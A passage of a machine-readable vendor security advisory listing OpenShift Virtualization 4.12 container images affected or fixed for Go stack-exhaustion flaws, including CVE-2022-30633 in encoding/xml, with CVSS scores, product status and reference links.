attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: path/filepath: stack exhaustion in Glob", }, { cve: "CVE-2022-30633", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107392", }, ], notes: [ { category: "description", text: "A flaw was found in golang. Calling Unmarshal on an XML document into a Go struct, which has a nested field that uses the \"any\" field tag, can cause a panic due to stack exhaustion.", title: "Vulnerability description", }, { category: "summary", text: "golang: encoding/xml: stack exhaustion in Unmarshal", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-30633", }, { category: "external", summary: "RHBZ#2107392", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-30633", url: "https://www.cve.org/CVERecord?id=CVE-2022-30633", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-30633", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-30633", }, { category: "external", summary: "https://go.dev/issue/53611", url: "https://go.dev/issue/53611", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", 